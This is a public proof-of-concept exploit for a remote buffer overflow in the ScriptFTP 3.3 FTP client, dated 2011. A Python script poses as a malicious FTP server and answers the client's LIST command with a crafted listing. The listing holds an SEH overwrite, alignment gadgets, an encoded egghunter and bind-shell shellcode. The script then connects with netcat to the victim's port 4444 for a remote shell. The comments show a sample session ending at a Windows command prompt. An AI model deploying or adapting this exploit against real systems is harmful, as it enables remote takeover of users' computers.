# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST) # Date: September 20, 2011 # Author: modpr0be # Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe # Version: 3.3 # Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536) # CVE : - # # Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner # # You should create your own script to work with ScriptFTP # for example; enable passive and get the remote directory # on your evil ftp server. # # my example script: # OPENHOST("","ftp","ftp") # SETPASSIVE(ENABLED) # GETLIST($list,REMOTE_FILES) # CLOSEHOST # save it to a file with .ftp extension (eg: exploit.ftp) # root@bt :/# python scriptftp-bof-poc.py # [*] ScriptFTP 3.3 Remote Buffer Overflow POC # [*] by modpr0be[at]digital-echidna[dot]org. # [*] thanks a lot to cyb3r.anbu | otoy :) # ============================================= # [*] Evil FTP Server Ready # [*] Server initiated. # [*] Awaiting connection... # [*] Connection created by # [*] Establishing session. # [*] Pwning in progress.. # [*] This may take up 50 seconds or less. # [!] Hunter is hunting the Egg ;) # [!] Waiting for a shell.. # [!] 0wn3d..! # # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\ScriptFTP> # # Yes, this poc is using PASSIVE connection and it will # take some time to establish. I love the way we wait for a shell ;) #!/usr/bin/python import socket import os import sys import time class ftp_server: def __init__(self): self.host = '' self.passive_port = 7214 self.log(""" [*] ScriptFTP <=3.3 Remote Buffer Overflow POC [*] by modpr0be[at]digital-echidna[dot]org [*] thanks a lot to cyb3r.anbu | otoy :) ============================================= [*] Evil FTP Server Ready""") self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.bind(('', 21)) self.sock.listen(1) a = self.passive_port/256 b = self.passive_port%256 self.tuple_port = (a, b) self.host_join = ','.join(self.host.split('.')) self.passive = False self.log("[*] Server initiated.") def log(self, msg): print msg def get(self): return self.conn.recv(1024).replace('\r', '').replace('\n', '') def getcwd(self): return os.getcwd().split(chr(92))[-1] def put(self, ftr): x = { 150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port), 200:" Type okay.", 220:" %s Server is ready."%self.host, 226:" Listing completed.", 227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]), 230:" User logged in, proceed.", 250:' "/%s" is new cwd.'%self.getcwd(), 257:' "/%s" is cwd.'%self.getcwd(), 331:" User name okay, need password.", 502:" Command not implemented.", 551:" Requested action aborted. Page type unknown." }[ftr] s = '%s%s\r\n'%(ftr, x) self.conn.send(s) return s def main(self): self.log("[*] Awaiting connection...") self.conn, addr = self.sock.accept () self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0]) self.put(220) self.log("[*] Pwning in progress..") self.log("[*] This may take up 50 seconds or less.") while 1: try: data = self.get().upper() except socket.error: self.conn.close() self.sock.shutdown(socket.SHUT_RDWR) raise socket.error if data[:4] == 'USER': s = 331 elif data[:4] == 'PASS': s = 230 elif data[:3] == 'PWD': s = 257 elif data[:4] == 'TYPE': s = 200 elif data[:4] == 'PASV': # create passive port self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock2.bind(('', self.passive_port )) self.sock2.listen(1) s = self.put(227) self.conn2, addr = self.sock2.accept() self.passive = True s = 0 # don't routine elif data[:3] == 'CWD': try: os.chdir('..%s'%data.split(' ')[-1]) s = 250 except OSError: s = 551 elif data[:4] == 'LIST': s = self.put(150) s = self.passive_do(1) s = 0 # don't routine print "[!] Hunter is hunting the Egg ;)" time.sleep(50) print "[!] Waiting for a shell.." time.sleep(2) print "[!] 0wn3d..!\n" os.system("nc %s 4444"%addr[0]) sys.exit() else: s = 502 if s: s = self.put(s) def passive_do(self, id): if id == 1: #bind to port 4444 bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ" "APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A" "IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI" "XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO" "8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J" "P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1" "8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL" "MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4" "KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2" "1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3" "80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX" "U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM" "2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP" "8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK" "OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO" "TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P" "SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9" "E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW" "KQ7MCT2BO2JKPQCKOZ5A") # 32bit egghunter from corelanc0d3r, thx ;) egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA" "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5" "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB" "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1" "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O" "SEYWKOYWA") junk = "A" * 1746 #junk nseh = "\x61\x62" #nseh seh = "\x45\x5B" #seh ppr somewhere on scriptftp dir #prepare for align align = "\x60" #pushad align += "\x73" #nop/align align += "\x53" #push ebx align += "\x73" #nop/align align += "\x58" #pop eax align += "\x73" #nop/align align += "\x05\x02\x11" #add eax,0x11000200 align += "\x73" #nop/align align += "\x2d\x01\x11" #sub eax,0x11000120 align += "\x73" #nop/align #walking walk = "\x50" #push eax walk += "\x73" #nop/align walk += "\xc3" #ret #align again align2 = "0t0t" + "\x73\x57\x73\x58\x73" #nop/push edi/nop/pop eax/nop align2 += "\xb9\x1b\xaa" #mov ecx,0xaa001b00 align2 += "\xe8\x73" #add al,ch + nop align2 += "\x50\x73\xc3" #push eax,nop,ret sampah1 = "\x44" * 106 + "\x73" #eax+106/align nop sampah2 = "\x42" * 544 #right after shellcode crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1 res = """-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+crash+""".txt\r\ndrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 A\r\nrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+ crash +".txt\r\n" self.conn2.send(res) # self.conn2.send('\r\n') # send blank return res try: ftp_server().main() except socket.error: print "[!] Socket is not ready, shutting down...\n"